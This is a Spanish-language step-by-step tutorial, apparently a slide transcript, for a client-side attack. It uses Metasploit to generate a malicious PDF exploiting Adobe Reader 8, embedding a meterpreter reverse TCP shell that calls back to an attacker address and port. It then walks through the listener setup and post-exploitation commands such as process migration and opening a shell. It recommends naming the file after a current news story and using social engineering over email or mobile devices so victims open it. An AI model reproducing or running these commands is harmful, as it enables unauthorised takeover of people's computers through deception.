client side attack

7
 CLIENT SIDE ATTACK Client Side Attack (Ataque del lado del cliente) Objetivo Tener acceso y tomar control de una máquina víctima explotando una vulnerabilidad de una aplicación que será ejecutada por el usuario víctima. En que consiste el ataque del lado del cliente  Esta técnica consiste en crear e infectar un archivo malicioso con el fin de obtener acceso a la computadora victima ya sea por red local o por la web. El archivo malicioso lo crearemos utilizando la herramienta metasploit que viene incorporada en BACKTRACK 5 Realizando ataque del lado del cliente Ahora procederemos a realizar el ataque: Tenemos nuestra maquina victima con Windows XP el cual tiene instalado el adobe reader 8, y nuestra máquina atacante el cual tiene instalado el BACKTRACK 5 Una vez que entremos a nuestro sistema BACKTRACK abrimos una consola de comandos y levantamos la herramienta Metaspolit escribiendo la siguiente instrucción: msfconsole Una vez cargado el Metaspolit, procederemos a ejecutar las siguientes líneas de comando.

Upload: leonel-aquino

Post on 20-Jul-2015

121 views

Category:

Documents


1 download

TRANSCRIPT

Page 1: Client Side Attack

5/16/2018 Client Side Attack - slidepdf.com

http://slidepdf.com/reader/full/client-side-attack 1/7

CLIENT SIDE ATTACK

Client Side Attack (Ataque del lado del cliente) 

Objetivo 

Tener acceso y tomar control de una máquina víctima explotando una vulnerabilidad de una

aplicación que será ejecutada por el usuario víctima.

En que consiste el ataque del lado del cliente 

Esta técnica consiste en crear e infectar un archivo malicioso con el fin de obtener acceso a

la computadora victima ya sea por red local o por la web. El archivo malicioso locrearemos utilizando la herramienta metasploit que viene incorporada en BACKTRACK 5

Realizando ataque del lado del cliente

Ahora procederemos a realizar el ataque:Tenemos nuestra maquina victima con Windows XP el cual tiene instalado el adobe reader

8, y nuestra máquina atacante el cual tiene instalado el BACKTRACK 5

Una vez que entremos a nuestro sistema BACKTRACK abrimos una consola de comandos

y levantamos la herramienta Metaspolit escribiendo la siguiente instrucción:

msfconsole 

Una vez cargado el Metaspolit, procederemos a ejecutar las siguientes líneas de comando.

Page 2: Client Side Attack

5/16/2018 Client Side Attack - slidepdf.com

http://slidepdf.com/reader/full/client-side-attack 2/7

 //Luego que se haya ejecutado metasploit, vamos a crear para nuestro archivo malicioso,

que en este caso es para nuestro archivo PDF. utilizaremos los siguientes comandos// 

msf> use exploit/windows/fileformat/adobe_utilprintf  

 // acontinuación definimos el nombre como vamos a llamar nuestro PDF malicioso // 

msfexploit(adobe_utilprintf) > set FILENAME juicio_EL_UNIVERSO.pdf  

 //ponemos este nombre ya que es la noticia del momento y es mas fácil que nuestra victimaabra el archivo// 

FILENAME =>juicio_EL_UNIVERSO.pdf  

 // Ahora definimos y cargar el ataque reverso en el PDF que vamos a realizar.// 

msfexploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD =>windows/meterpreter/reverse_tcp 

 //vamos a setear el host de la máquina atacante, ósea en este caso nuestra máquina// 

msfexploit(adobe_utilprintf) > set LHOST 192.168.200.6

LHOST =>192.168.200.6 

 //luego seteamos nuestro puerto ósea de la máquina atacante, por donde se va a escuchar elataque o a realizar el ataque// 

msf exploit(adobe_utilprintf) > set LPORT 4455

LPORT =>4455

msf exploit(adobe_utilprintf) > show options 

 //luego ejecutamos el exploit para crear nuestro archivo malicioso.// 

Page 3: Client Side Attack

5/16/2018 Client Side Attack - slidepdf.com

http://slidepdf.com/reader/full/client-side-attack 3/7

msf exploit(adobe_utilprintf) > exploit 

Aquí vemos que se ha creado nuestro PDF juicio EL UNIVERSO.pdf que se genera en esa

ruta, nosotros debemos tomar esta ruta y por cualquier medio sea por E-mail o dispositivos

movil de tal forma hacer que ejecuten nuestro archivo malicioso en la máquina víctima conestrategias de ingeniería social.

 //+Escuchando la conexion

Utilizamos los siguientes comandos// 

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp 

 //Luego Configuramos nuestro puerto por el cual vamos a recibir la conexion, los puertos

pueden cambiar según el exploit que utilicemos// 

msf exploit(handler) > set LPORT 4455

LPORT => 4455 

 // Y configuramos nuestro Host de nuestra maquina atacante// 

msf exploit(handler) > set LHOST 192.168.200.6

LHOST => 192.168.200.6 

 // Y aqui iniciamos nuestro ataque// 

msf exploit(handler) > exploit 

[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler

[*] Starting the payload handler… 

Page 4: Client Side Attack

5/16/2018 Client Side Attack - slidepdf.com

http://slidepdf.com/reader/full/client-side-attack 4/7

 

En nuestra máquina víctima se descarga el archivo malicioso

 //Aquí tenemos ya descargado nuestro archivo malicioso en la máquina de nuestra víctima

y procederemos a ejecutarlo.La victima va intentar abrir el archivo pero en ese momento se ejecutara nuestro código

malicioso que nos va a permitir a exceder al sistema operativo de la víctima, y por otro lado

en nuestra maquina atacante va a estar a la espera de pescar a una víctima.// 

Page 5: Client Side Attack

5/16/2018 Client Side Attack - slidepdf.com

http://slidepdf.com/reader/full/client-side-attack 5/7

 

 //Hemos accedido a la maquina víctima, lo primero que debemos hacer es saber que sistemaoperativo hemos accedido, con el siguiente comando:// 

meterpreter > sysinfo 

 //luego conocemos que servicios están levantados o ejecutándose en la maquina victima conel siguiente comando:// 

meterpreter > ps 

Page 6: Client Side Attack

5/16/2018 Client Side Attack - slidepdf.com

http://slidepdf.com/reader/full/client-side-attack 6/7

 //Luego de verificar los procesos nos migraremos a un proceso que no se finalice tan

fácilmente puesto que al momento que cierren el adobe reader perderemos la conexión, en

este caso nos migraremos al proceso explore.exe tomando el Id proceso del mismo paratener más tiempo para indagar, nos migramos de proceso con el siguiente comando:// 

meterpreter > migrate 1476 

 // ahora vamos a proceder a levantar una Shell que nos permitirá a acceder al sistema de lamaquina víctima, para hacer lo que nosotros queramos. control total.// 

 //hemos accedido al disco C de la maquina víctima y hacer lo que queramos.y por últimos crearemos una carpeta en la máquina víctima, con el siguiente comando de

DOS mkdir// 

Page 7: Client Side Attack

5/16/2018 Client Side Attack - slidepdf.com

http://slidepdf.com/reader/full/client-side-attack 7/7

A continuación te agregamos un video para que te guies: